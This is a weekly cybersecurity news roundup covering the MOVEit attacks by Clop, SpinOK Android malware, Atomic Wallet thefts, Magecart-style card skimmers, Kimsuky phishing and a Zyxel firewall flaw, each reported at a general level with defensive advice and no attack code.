With cybercrimes rising, you need to learn to ward off cyber attacks, which can only be done with proper, updated knowledge of cybersecurity’s latest developments. Here is the latest cybersecurity news of the week. 

 

MOVEit Extortion Attacks Attributed to Clop Ransomware

The notorious Clop ransomware group has claimed responsibility for the recent MOVEit Transfer data-theft attacks, revealing that they exploited a zero-day vulnerability during the US Memorial Day holiday weekend.

This confirmation aligns with Microsoft’s attribution of the attacks to the malicious group known as ‘Lace Tempest’ or TA505. Clop is notorious for conducting large-scale exploitation campaigns during holidays when organizations are understaffed, as demonstrated in their previous Accellion FTA zero-day attack during the Christmas days of 2020.

The ransomware gang stated that they have not yet extorted their victims, opting to review the stolen data to identify valuable information that can be leveraged for ransom demands. 

Organizations like Zellis, a UK payroll and HR solutions provider, are coming forward, acknowledging being affected by the MOVEit attacks. 

 

Increasing Number of Apps Found to Contain SpinOK Android Malware With 30 Million Installations

CloudSEK’s security team has discovered a new batch of Android apps on Google Play infected with the SpinOK malware, reportedly installed over 30 million times

The team found 193 apps carrying the malicious SDK (Software Development Kit) in addition to another 101 discovered by Dr. Web. Of them, 43 are still active on Google Play.

SpinOK, initially detected by Dr. Web in a set of apps downloaded over 400 million times, spreads through an SDK supply chain attack, posing as a legitimate mini-game SDK while secretly engaging in file theft and clipboard manipulation. Despite CloudSEK’s notification to Google, many identified malicious apps remain available for download on Google Play.

 

Android Malware

 

Avoiding random applications and sticking to the essential ones would be best to reduce the chances of falling victim to such malicious campaigns. 

 

Crypto Theft Surpasses $35 Million as a Result of Atomic Wallet Hacks

Atomic Wallet, a popular mobile and desktop cryptocurrency wallet, is investigating reports of a significant crypto theft from users’ wallets. 

Following reports of compromised wallets, Atomic Wallet has taken measures to investigate the situation, collaborating with third-party security organizations to trace and block the stolen funds. The download server for the wallet has been temporarily shut down to address security concerns.

Blockchain sleuth ZachXBT has been monitoring the stolen funds and estimates the total to exceed $35 million across various cryptocurrencies. Atomic Wallet users have reported the theft on social media, prompting the wallet’s team to collect information from victims to aid their investigation. 

It remains unclear how the compromise occurred, and users are advised to transfer their assets to alternative wallets while the security incident is under scrutiny.

 

Credit Card Stealer Scripts Hosted on Legitimate Sites Following Hijacking by Threat Actors

In a new credit card stealing campaign similar to Magecart, legitimate websites are hijacked to serve as makeshift C2 (Command and Control) servers.

Akamai researchers monitoring the campaign have uncovered compromises in the USA, Australia, the UK, Brazil, Peru, and Estonia. The attackers exploit vulnerabilities in legitimate sites, using them as C2 servers to deploy the credit card skimmer codes and evade detection by leveraging reputable third-party services.

 

Credit Card Fraud statistics

Image sourced from pinterest.com

 

The threat actors stealthily execute data theft operations by employing obfuscation techniques like Base64 encoding and mimicking well-known services such as Google Tag Manager and Facebook Pixel. 

To safeguard against Magecart-style infections, website owners must secure their admin accounts and regularly update their CMS (Content Management Systems) and plugins. Furthermore, customers can mitigate risks using electronic payment methods, virtual cards, or setting credit card transaction limits.

 

Kimsuky Hackers Impersonate Journalists to Steal Intel, Warn NSA and FBI

The state-sponsored North Korean threat actors group known as Kimsuky, also called APT43, has been launching spear-phishing campaigns by impersonating journalists and academics to gather intelligence

Multiple US and South Korean government agencies have issued a warning based on tracking and analyzing the group’s recent activities and attack themes. Kimsuky operates under North Korea’s Reconnaissance General Bureau and has conducted large-scale espionage campaigns since at least 2012.

The adversaries meticulously plan their spear-phishing attacks, utilizing email addresses that closely resemble real individuals and crafting realistic content to establish communication and gain the target’s trust. 

Users must use strong passwords, enable MFA (Multi-Factor Authentication), and verify the validity of contact information through the official websites of media groups or journalists to stay secure from such attacks. 

 

Ongoing Attacks Exploit Critical Flaw in Zyxel Firewall, Warn Experts

A critical command injection vulnerability, identified as CVE-2023-28771, is being widely exploited by malicious actors to install malware on Zyxel networking devices. 

The flaw is present in the default configuration of affected firewall and VPN devices, enabling unauthenticated remote code execution through UDP port 500 using a specially crafted IKEv2 packet. Zyxel released patches on April 25, 2023, urging users of specific product versions to apply them promptly.

 

Mirai-based botnet malware

 

CISA (Cybersecurity & Infrastructure Security Agency) has issued an alert concerning the active exploitation of CVE-2023-28771 and advising federal agencies to update by June 21, 2023. Rapid7 has confirmed the flaw’s exploitation, including its use by Mirai-based botnet malware

System administrators must swiftly install the latest security updates to keep their organizations’ information systems secure and mitigate the risks of these vulnerabilities.

Pin It on Pinterest

Share This